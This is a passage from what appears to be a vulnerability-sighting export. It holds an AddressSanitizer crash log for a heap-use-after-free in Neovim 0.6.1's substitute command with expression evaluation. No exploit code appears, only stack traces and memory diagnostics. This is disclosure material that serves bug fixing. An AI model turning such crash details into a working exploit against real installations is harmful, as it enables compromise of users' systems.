/home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3728:7\n #7 0x79ad00 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3622:7\n #8 0x79a667 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3541:7\n #9 0x761687 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3470:7\n #10 0x75129c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3394:7\n #11 0x74fb43 in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3351:9\n #12 0x751a11 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:852:7\n #13 0xd37965 in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6769:23\n #14 0xd3998a in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6662:16\n #15 0x8cb552 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4058:20\n #16 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n #17 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #18 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #19 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n #20 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n #21 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n #22 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n #23 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #24 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #25 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n #26 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n #27 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n #28 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #29 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #30 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n #31 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n #32 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n #33 0x7f5d9e663082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n #34 0x45df4d in _start (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x45df4d)\n\n0x60200003b1f5 is located 5 bytes inside of 7-byte region [0x60200003b1f0,0x60200003b1f7)\nfreed by thread T0 here:\n #0 0x4d640d in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x4d640d)\n #1 0xb5f304 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:122:3\n #2 0x8b814b in sub_set_replacement /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3260:3\n #3 0x8c7356 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3546:7\n #4 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n #5 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #6 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #7 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n #8 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n #9 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n #10 0x7a5514 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3304:13\n #11 0x79fd76 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:4232:15\n #12 0x79cffe in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3903:7\n #13 0x79b97c in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3728:7\n #14 0x79ad00 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3622:7\n #15 0x79a667 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3541:7\n #16 0x761687 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3470:7\n #17 0x75129c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3394:7\n #18 0x74fb43 in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3351:9\n #19 0x751a11 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:852:7\n #20 0xd37965 in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6769:23\n #21 0xd3998a in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6662:16\n #22 0x8cb552 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4058:20\n #23 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n #24 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #25 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #26 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n #27 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n #28 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n #29 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n\npreviously allocated by thread T0 here:\n #0 0x4d668d in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x4d668d)\n #1 0xb5f062 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:74:15\n #2 0xb5f224 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:108:15\n #3 0xb5f66d in xmallocz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:187:15\n #4 0xb5f6e8 in xmemdupz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:205:17\n #5 0xb5fe3b in xstrdup /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:424:10\n #6 0x8c7260 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3547:16\n #7 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n #8 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #9 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #10 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n #11 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n #12 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n #13 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n #14 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #15 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #16 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n #17 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n #18 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n #19 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #20 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #21 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n #22 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n #23 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n #24 0x7f5d9e663082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x470b78) in strlen\nShadow bytes around the buggy address:\n 0x0c047ffff5e0: fa fa 00 fa fa fa 05 fa fa fa 01 fa fa fa 01 fa\n 0x0c047ffff5f0: fa fa 01 fa fa fa fd fd fa fa 05 fa fa fa 01 fa\n 0x0c047ffff600: fa fa fd fd fa fa 00 01 fa fa fd fd fa fa fd fa\n 0x0c047ffff610: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 fa\n 0x0c047ffff620: fa fa 01 fa fa fa fd fa fa fa fd fa fa fa fd fa\n=>0x0c047ffff630: fa fa fd fa fa fa fd fd fa fa 00 06 fa fa[fd]fa\n 0x0c047ffff640: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 02 fa\n 0x0c047ffff650: fa fa 07 fa fa fa fd fd fa fa 00 00 fa fa fd fa\n 0x0c047ffff660: fa fa 02 fa fa fa 06 fa fa fa 07 fa fa fa 02 fa\n 0x0c047ffff670: fa fa fd fa fa fa 06 fa fa fa 02 fa fa fa fd fa\n 0x0c047ffff680: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n==25706==ABORTING", "creation_timestamp": "2026-06-13T13:00:31.000000Z"} https://vulnerability.circl.lu/sighting/68f7c78b-5751-43b4-a03c-6663a20e4fe9/export Sat, 13 Jun 2026 13:00:31 +0000